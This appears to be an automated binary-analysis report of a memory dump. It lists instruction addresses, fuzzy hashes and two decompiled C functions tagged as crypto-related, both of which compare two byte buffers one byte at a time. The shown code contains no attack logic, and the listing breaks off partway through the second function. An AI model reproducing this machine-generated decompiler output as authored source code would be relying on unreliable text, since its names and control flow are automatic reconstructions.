0x00000000
0x0042b361
0x00000000
0x0042b361
0x0042b35b
0x0042b730
0x0042b736
0x00000000
0x00000000
0x00000000
0x0042b736
0x0042b6a1
0x0042b6a3
0x0042b6b8
0x0042b6c0
0x0042b6c2
0x0042b6d7
0x0042b6df
0x0042b6e1
0x0042b6f6
0x0042b6fe
0x0042b700
0x0042b709
0x0042b709
0x0042b709
0x00000000
0x0042b700
0x0042b6ea
0x0042b6ea
0x0042b6f0
0x00000000
0x00000000
0x00000000
0x0042b6f0
0x0042b6cb
0x0042b6cb
0x0042b6d1
0x00000000
0x00000000
0x00000000
0x0042b6d1
0x0042b6ac
0x0042b6ac
0x0042b6b2
0x00000000
0x00000000
0x00000000
0x0042b6b2
0x0042b61a
0x0042b61c
0x0042b631
0x0042b639
0x0042b63b
0x0042b650
0x0042b658
0x0042b65a
0x0042b66f
0x0042b677
0x0042b679
0x0042b682
0x0042b682
0x0042b682
0x00000000
0x0042b679
0x0042b663
0x0042b663
0x0042b669
0x00000000
0x00000000
0x00000000
0x0042b669
0x0042b644
0x0042b644
0x0042b64a
0x00000000
0x00000000
0x00000000
0x0042b64a
0x0042b625
0x0042b625
0x0042b62b
0x00000000
0x00000000
0x00000000
0x0042b62b
0x0042b593
0x0042b595
0x0042b5aa
0x0042b5b2
0x0042b5b4
0x0042b5c9
0x0042b5d1
0x0042b5d3
0x0042b5e8
0x0042b5f0
0x0042b5f2
0x0042b5fb
0x0042b5fb
0x0042b5fb
0x00000000
0x0042b5f2
0x0042b5dc
0x0042b5dc
0x0042b5e2
0x00000000
0x00000000
0x00000000
0x0042b5e2
0x0042b5bd
0x0042b5bd
0x0042b5c3
0x00000000
0x00000000
0x00000000
0x0042b5c3
0x0042b59e
0x0042b59e
0x0042b5a4
0x00000000
0x00000000
0x00000000
0x0042b5a4
0x0042b50b
0x0042b50d
0x0042b522
0x0042b52a
0x0042b52c
0x0042b541
0x0042b549
0x0042b54b
0x0042b560
0x0042b568
0x0042b56a
0x0042b573
0x0042b573
0x0042b573
0x00000000
0x0042b56a
0x0042b554
0x0042b554
0x0042b55a
0x00000000
0x00000000
0x00000000
0x0042b55a
0x0042b535
0x0042b535
0x0042b53b
0x00000000
0x00000000
0x00000000
0x0042b53b
0x0042b516
0x0042b516
0x0042b51c
0x00000000
0x00000000
0x00000000
0x0042b51c
0x0042b484
0x0042b486
0x0042b49b
0x0042b4a3
0x0042b4a5
0x0042b4ba
0x0042b4c2
0x0042b4c4
0x0042b4d9
0x0042b4e1
0x0042b4e3
0x0042b4ec
0x0042b4ec
0x0042b4ec
0x00000000
0x0042b4e3
0x0042b4cd
0x0042b4cd
0x0042b4d3
0x00000000
0x00000000
0x00000000
0x0042b4d3
0x0042b4ae
0x0042b4ae
0x0042b4b4
0x00000000
0x00000000
0x00000000
0x0042b4b4
0x0042b48f
0x0042b48f
0x0042b495
0x00000000
0x00000000
0x00000000
0x0042b495
0x0042b3fd
0x0042b3ff
0x0042b414
0x0042b41c
0x0042b41e
0x0042b433
0x0042b43b
0x0042b43d
0x0042b452
0x0042b45a
0x0042b45c
0x0042b465
0x0042b465
0x0042b465
0x00000000
0x0042b45c
0x0042b446
0x0042b446
0x0042b44c
0x00000000
0x00000000
0x00000000
0x0042b44c
0x0042b427
0x0042b427
0x0042b42d
0x00000000
0x00000000
0x00000000
0x0042b42d
0x0042b408
0x0042b408
0x0042b40e
0x00000000
0x00000000
0x00000000
0x0042b36e
0x0042b36e
0x0042b372
0x0042b376
0x0042b378
0x0042b38d
0x0042b38d
0x0042b391
0x0042b395
0x0042b397
0x0042b3ac
0x0042b3ac
0x0042b3b0
0x0042b3b4
0x0042b3b6
0x0042b3cb
0x0042b3cb
0x0042b3cf
0x0042b3d3
0x0042b3d5
0x0042b3d7
0x0042b3de
0x0042b3de
0x0042b3de
0x00000000
0x0042b3d5
0x0042b3b8
0x0042b3bc
0x0042b3bf
0x0042b3bf
0x0042b3c5
0x00000000
0x00000000
0x00000000
0x0042b3c5
0x0042b399
0x0042b39d
0x0042b3a0
0x0042b3a0
0x0042b3a6
0x00000000
0x00000000
0x00000000
0x0042b3a6
0x0042b37a
0x0042b37e
0x0042b381
0x0042b381
0x0042b387
0x00000000
0x00000000
0x00000000
0x0042b387
0x0042a807
0x0042a807
0x00000000

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 53da86afcaeb38bb914e707ac338d37e3895ca567e59cd1a618ac4798d20cf6b
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 02C1A273E0A9F2468775452E645823FEF62AF81B4435FC392DCD03F689C22A6D12D6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0042AF7E Relevance: .3, Instructions: 349
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0042AF7E(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t200;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t205;
				signed int _t210;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t324;
				void* _t326;
				void* _t328;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t284 = 0;
					L15:
					if(_t284 != 0) {
						goto L1;
					}
					_t200 =  *(_t191 - 0x1a);
					if(_t200 ==  *(_t195 - 0x1a)) {
						_t284 = 0;
						L26:
						if(_t284 != 0) {
							goto L1;
						}
						_t201 =  *(_t191 - 0x16);
						if(_t201 ==  *(_t195 - 0x16)) {
							_t284 = 0;
							L37:
							if(_t284 != 0) {
								goto L1;
							}
							_t202 =  *(_t191 - 0x12);
							if(_t202 ==  *(_t195 - 0x12)) {
								_t284 = 0;
								L48:
								if(_t284 != 0) {
									goto L1;
								}
								_t203 =  *(_t191 - 0xe);
								if(_t203 ==  *(_t195 - 0xe)) {
									_t284 = 0;
									L59:
									if(_t284 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t284 = 0;
										L70:
										if(_t284 != 0) {
											goto L1;
										}
										_t205 =  *(_t191 - 6);
										if(_t205 ==  *(_t195 - 6)) {
											_t284 = 0;
											L81:
											if(_t284 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t287 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t287 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t8 = (0 | _t192 > 0x00000000) - 1; // -1
													_t192 = (_t192 > 0) + _t8;
												}
												goto L3;
											}
											_t210 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
											if(_t210 != 0) {
												_t192 = _t210;
												goto L3;
											}
											goto L4;
										}
										_t289 = (_t205 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t289 == 0) {
											L74:
											_t291 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t291 == 0) {
												L76:
												_t293 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t293 == 0) {
													L78:
													_t284 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t284 != 0) {
														_t182 = (0 | _t284 > 0x00000000) - 1; // -1
														_t284 = (_t284 > 0) + _t182;
													}
													goto L81;
												}
												_t176 = (0 | _t293 > 0x00000000) - 1; // -1
												_t284 = (_t293 > 0) + _t176;
												if(_t284 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t170 = (0 | _t291 > 0x00000000) - 1; // -1
											_t284 = (_t291 > 0) + _t170;
											if(_t284 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t164 = (0 | _t289 > 0x00000000) - 1; // -1
										_t284 = (_t289 > 0) + _t164;
										if(_t284 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t296 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t296 == 0) {
										L63:
										_t298 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t298 == 0) {
											L65:
											_t300 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t300 == 0) {
												L67:
												_t284 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t284 != 0) {
													_t157 = (0 | _t284 > 0x00000000) - 1; // -1
													_t284 = (_t284 > 0) + _t157;
												}
												goto L70;
											}
											_t151 = (0 | _t300 > 0x00000000) - 1; // -1
											_t284 = (_t300 > 0) + _t151;
											if(_t284 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t145 = (0 | _t298 > 0x00000000) - 1; // -1
										_t284 = (_t298 > 0) + _t145;
										if(_t284 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t139 = (0 | _t296 > 0x00000000) - 1; // -1
									_t284 = (_t296 > 0) + _t139;
									if(_t284 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t303 = (_t203 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t303 == 0) {
									L52:
									_t305 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t305 == 0) {
										L54:
										_t307 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t307 == 0) {
											L56:
											_t284 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t284 != 0) {
												_t131 = (0 | _t284 > 0x00000000) - 1; // -1
												_t284 = (_t284 > 0) + _t131;
											}
											goto L59;
										}
										_t125 = (0 | _t307 > 0x00000000) - 1; // -1
										_t284 = (_t307 > 0) + _t125;
										if(_t284 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t119 = (0 | _t305 > 0x00000000) - 1; // -1
									_t284 = (_t305 > 0) + _t119;
									if(_t284 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t113 = (0 | _t303 > 0x00000000) - 1; // -1
								_t284 = (_t303 > 0) + _t113;
								if(_t284 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t310 = (_t202 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t284 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t284 != 0) {
											_t106 = (0 | _t284 > 0x00000000) - 1; // -1
											_t284 = (_t284 > 0) + _t106;
										}
										goto L48;
									}
									_t100 = (0 | _t314 > 0x00000000) - 1; // -1
									_t284 = (_t314 > 0) + _t100;
									if(_t284 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t94 = (0 | _t312 > 0x00000000) - 1; // -1
								_t284 = (_t312 > 0) + _t94;
								if(_t284 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t88 = (0 | _t310 > 0x00000000) - 1; // -1
							_t284 = (_t310 > 0) + _t88;
							if(_t284 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t317 = (_t201 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t317 == 0) {
							L30:
							_t319 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t319 == 0) {
								L32:
								_t321 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t321 == 0) {
									L34:
									_t284 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t284 != 0) {
										_t81 = (0 | _t284 > 0x00000000) - 1; // -1
										_t284 = (_t284 > 0) + _t81;
									}
									goto L37;
								}
								_t75 = (0 | _t321 > 0x00000000) - 1; // -1
								_t284 = (_t321 > 0) + _t75;
								if(_t284 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t69 = (0 | _t319 > 0x00000000) - 1; // -1
							_t284 = (_t319 > 0) + _t69;
							if(_t284 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t63 = (0 | _t317 > 0x00000000) - 1; // -1
						_t284 = (_t317 > 0) + _t63;
						if(_t284 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t324 = (_t200 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t324 == 0) {
						L19:
						_t326 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t326 == 0) {
							L21:
							_t328 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t328 == 0) {
								L23:
								_t284 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t284 != 0) {
									_t56 = (0 | _t284 > 0x00000000) - 1; // -1
									_t284 = (_t284 > 0) + _t56;
								}
								goto L26;
							}
							_t50 = (0 | _t328 > 0x00000000) - 1; // -1
							_t284 = (_t328 > 0) + _t50;
							if(_t284 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t44 = (0 | _t326 > 0x00000000) - 1; // -1
						_t284 = (_t326 > 0) + _t44;
						if(_t284 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t38 = (0 | _t324 > 0x00000000) - 1; // -1
					_t284 = (_t324 > 0) + _t38;
					if(_t284 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t31 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t31;
								}
								goto L15;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t25 = __edx - 1; // -1
							__esi = __edx + _t25;
							if(__edx + _t25 != 0) {
								goto L1;
							}
							goto L12;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t19 = __edx - 1; // -1
						__esi = __edx + _t19;
						if(__edx + _t19 != 0) {
							goto L1;
						}
						goto L10;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t13 = __edx - 1; // -1
					__esi = __edx + _t13;
					if(__edx + _t13 != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t284;
				goto L3;
			}

0x0042af7e
0x0042af7e
0x0042af84
0x0042affb
0x0042affd
0x0042afff
0x00000000
0x00000000
0x0042b005
0x0042b00b
0x0042b082
0x0042b084
0x0042b086
0x00000000
0x00000000
0x0042b08c
0x0042b092
0x0042b109
0x0042b10b
0x0042b10d
0x00000000
0x00000000
0x0042b113
0x0042b119
0x0042b190
0x0042b192
0x0042b194
0x00000000
0x00000000
0x0042b19a
0x0042b1a0
0x0042b217
0x0042b219
0x0042b21b
0x00000000
0x00000000
0x0042b227
0x0042b29f
0x0042b2a1
0x0042b2a3
0x00000000
0x00000000
0x0042b2a9
0x0042b2af
0x0042b326
0x0042b328
0x0042b32a
0x00000000
0x00000000
0x0042b338
0x0042aba4
0x0042aba6
0x0042b84a
0x0042b84a
0x0042b346
0x0042b348
0x0042af5e
0x0042af66
0x0042af68
0x0042af75
0x0042af75
0x0042af75
0x00000000
0x0042af68
0x0042b355
0x0042b35b
0x0042b73c
0x00000000
0x0042b73c
0x00000000
0x0042b361
0x0042b2b8
0x0042b2ba
0x0042b2cf
0x0042b2d7
0x0042b2d9
0x0042b2ee
0x0042b2f6
0x0042b2f8
0x0042b30d
0x0042b315
0x0042b317
0x0042b320
0x0042b320
0x0042b320
0x00000000
0x0042b317
0x0042b301
0x0042b301
0x0042b307
0x00000000
0x00000000
0x00000000
0x0042b307
0x0042b2e2
0x0042b2e2
0x0042b2e8
0x00000000
0x00000000
0x00000000
0x0042b2e8
0x0042b2c3
0x0042b2c3
0x0042b2c9
0x00000000
0x00000000
0x00000000
0x0042b2c9
0x0042b231
0x0042b233
0x0042b248
0x0042b250
0x0042b252
0x0042b267
0x0042b26f
0x0042b271
0x0042b286
0x0042b28e
0x0042b290
0x0042b299
0x0042b299
0x0042b299
0x00000000
0x0042b290
0x0042b27a
0x0042b27a
0x0042b280
0x00000000
0x00000000
0x00000000
0x0042b280
0x0042b25b
0x0042b25b
0x0042b261
0x00000000
0x00000000
0x00000000
0x0042b261
0x0042b23c
0x0042b23c
0x0042b242
0x00000000
0x00000000
0x00000000
0x0042b242
0x0042b1a9
0x0042b1ab
0x0042b1c0
0x0042b1c8
0x0042b1ca
0x0042b1df
0x0042b1e7
0x0042b1e9
0x0042b1fe
0x0042b206
0x0042b208
0x0042b211
0x0042b211
0x0042b211
0x00000000
0x0042b208
0x0042b1f2
0x0042b1f2
0x0042b1f8
0x00000000
0x00000000
0x00000000
0x0042b1f8
0x0042b1d3
0x0042b1d3
0x0042b1d9
0x00000000
0x00000000
0x00000000
0x0042b1d9
0x0042b1b4
0x0042b1b4
0x0042b1ba
0x00000000
0x00000000
0x00000000
0x0042b1ba
0x0042b122
0x0042b124
0x0042b139
0x0042b141
0x0042b143
0x0042b158
0x0042b160
0x0042b162
0x0042b177
0x0042b17f
0x0042b181
0x0042b18a
0x0042b18a
0x0042b18a
0x00000000
0x0042b181
0x0042b16b
0x0042b16b
0x0042b171
0x00000000
0x00000000
0x00000000
0x0042b171
0x0042b14c
0x0042b14c
0x0042b152
0x00000000
0x00000000
0x00000000
0x0042b152
0x0042b12d
0x0042b12d
0x0042b133
0x00000000
0x00000000
0x00000000
0x0042b133
0x0042b09b
0x0042b09d
0x0042b0b2
0x0042b0ba
0x0042b0bc
0x0042b0d1
0x0042b0d9
0x0042b0db
0x0042b0f0
0x0042b0f8
0x0042b0fa
0x0042b103
0x0042b103
0x0042b103
0x00000000
0x0042b0fa
0x0042b0e4
0x0042b0e4
0x0042b0ea
0x00000000
0x00000000
0x00000000
0x0042b0ea
0x0042b0c5
0x0042b0c5
0x0042b0cb
0x00000000
0x00000000
0x00000000
0x0042b0cb
0x0042b0a6
0x0042b0a6
0x0042b0ac
0x00000000
0x00000000
0x00000000
0x0042b0ac
0x0042b014
0x0042b016
0x0042b02b
0x0042b033
0x0042b035
0x0042b04a
0x0042b052
0x0042b054
0x0042b069
0x0042b071
0x0042b073
0x0042b07c
0x0042b07c
0x0042b07c
0x00000000
0x0042b073
0x0042b05d
0x0042b05d
0x0042b063
0x00000000
0x00000000
0x00000000
0x0042b063
0x0042b03e
0x0042b03e
0x0042b044
0x00000000
0x00000000
0x00000000
0x0042b044
0x0042b01f
0x0042b01f
0x0042b025
0x00000000
0x00000000
0x00000000
0x0042af86
0x0042af86
0x0042af89
0x0042af8d
0x0042af8f
0x0042afa4
0x0042afa4
0x0042afa8
0x0042afac
0x0042afae
0x0042afc3
0x0042afc3
0x0042afc7
0x0042afcb
0x0042afcd
0x0042afe2
0x0042afe2
0x0042afe6
0x0042afea
0x0042afec
0x0042afee
0x0042aff5
0x0042aff5
0x0042aff5
0x00000000
0x0042afec
0x0042afcf
0x0042afd3
0x0042afd6
0x0042afd6
0x0042afdc
0x00000000
0x00000000
0x00000000
0x0042afdc
0x0042afb0
0x0042afb4
0x0042afb7
0x0042afb7
0x0042afbd
0x00000000
0x00000000
0x00000000
0x0042afbd
0x0042af91
0x0042af95
0x0042af98
0x0042af98
0x0042af9e
0x00000000
0x00000000
0x00000000
0x0042af9e
0x0042a807
0x0042a807
0x00000000

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 124ecf77c42defa90937765887efde52846f244eac2537cbad47bbfb6d216b11
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: B9C1A273E0A9F2468776452D641823FEF62AF81B4435FC392CCD03F689C62A6D22D5E4

Uniqueness

Uniqueness Score: -1.00%

Function 0042ABAC Relevance: .3, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0042ABAC(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t197;
				signed int _t271;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t309;
				void* _t311;
				void* _t313;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t271 = 0;
					L12:
					if(_t271 != 0) {
						goto L1;
					}
					_t192 =  *(_t183 - 0x19);
					if(_t192 ==  *(_t187 - 0x19)) {
						_t271 = 0;
						L23:
						if(_t271 != 0) {
							goto L1;
						}
						_t193 =  *(_t183 - 0x15);
						if(_t193 ==  *(_t187 - 0x15)) {
							_t271 = 0;
							L34:
							if(_t271 != 0) {
								goto L1;
							}
							_t194 =  *(_t183 - 0x11);
							if(_t194 ==  *(_t187 - 0x11)) {
								_t271 = 0;
								L45:
								if(_t271 != 0) {
									goto L1;
								}
								_t195 =  *(_t183 - 0xd);
								if(_t195 ==  *(_t187 - 0xd)) {
									_t271 = 0;
									L56:
									if(_t271 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t271 = 0;
										L67:
										if(_t271 != 0) {
											goto L1;
										}
										_t197 =  *(_t183 - 5);
										if(_t197 ==  *(_t187 - 5)) {
											_t271 = 0;
											L78:
											if(_t271 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t182 = (0 | _t184 > 0x00000000) - 1; // -1
												_t184 = (_t184 > 0) + _t182;
											}
											L2:
											return _t184;
										}
										_t274 = (_t197 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t274 == 0) {
											L71:
											_t276 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t276 == 0) {
												L73:
												_t278 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t278 == 0) {
													L75:
													_t271 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t271 != 0) {
														_t176 = (0 | _t271 > 0x00000000) - 1; // -1
														_t271 = (_t271 > 0) + _t176;
													}
													goto L78;
												}
												_t170 = (0 | _t278 > 0x00000000) - 1; // -1
												_t271 = (_t278 > 0) + _t170;
												if(_t271 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t164 = (0 | _t276 > 0x00000000) - 1; // -1
											_t271 = (_t276 > 0) + _t164;
											if(_t271 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t158 = (0 | _t274 > 0x00000000) - 1; // -1
										_t271 = (_t274 > 0) + _t158;
										if(_t271 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t281 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t281 == 0) {
										L60:
										_t283 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t283 == 0) {
											L62:
											_t285 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t285 == 0) {
												L64:
												_t271 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t271 != 0) {
													_t151 = (0 | _t271 > 0x00000000) - 1; // -1
													_t271 = (_t271 > 0) + _t151;
												}
												goto L67;
											}
											_t145 = (0 | _t285 > 0x00000000) - 1; // -1
											_t271 = (_t285 > 0) + _t145;
											if(_t271 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t139 = (0 | _t283 > 0x00000000) - 1; // -1
										_t271 = (_t283 > 0) + _t139;
										if(_t271 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t133 = (0 | _t281 > 0x00000000) - 1; // -1
									_t271 = (_t281 > 0) + _t133;
									if(_t271 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t288 = (_t195 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t288 == 0) {
									L49:
									_t290 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t290 == 0) {
										L51:
										_t292 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t292 == 0) {
											L53:
											_t271 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t271 != 0) {
												_t125 = (0 | _t271 > 0x00000000) - 1; // -1
												_t271 = (_t271 > 0) + _t125;
											}
											goto L56;
										}
										_t119 = (0 | _t292 > 0x00000000) - 1; // -1
										_t271 = (_t292 > 0) + _t119;
										if(_t271 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t113 = (0 | _t290 > 0x00000000) - 1; // -1
									_t271 = (_t290 > 0) + _t113;
									if(_t271 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t107 = (0 | _t288 > 0x00000000) - 1; // -1
								_t271 = (_t288 > 0) + _t107;
								if(_t271 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t295 = (_t194 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t295 == 0) {
								L38:
								_t297 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t297 == 0) {
									L40:
									_t299 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t299 == 0) {
										L42:
										_t271 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t271 != 0) {
											_t100 = (0 | _t271 > 0x00000000) - 1; // -1
											_t271 = (_t271 > 0) + _t100;
										}
										goto L45;
									}
									_t94 = (0 | _t299 > 0x00000000) - 1; // -1
									_t271 = (_t299 > 0) + _t94;
									if(_t271 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t88 = (0 | _t297 > 0x00000000) - 1; // -1
								_t271 = (_t297 > 0) + _t88;
								if(_t271 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t82 = (0 | _t295 > 0x00000000) - 1; // -1
							_t271 = (_t295 > 0) + _t82;
							if(_t271 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t302 = (_t193 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L27:
							_t304 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L29:
								_t306 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L31:
									_t271 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t271 != 0) {
										_t75 = (0 | _t271 > 0x00000000) - 1; // -1
										_t271 = (_t271 > 0) + _t75;
									}
									goto L34;
								}
								_t69 = (0 | _t306 > 0x00000000) - 1; // -1
								_t271 = (_t306 > 0) + _t69;
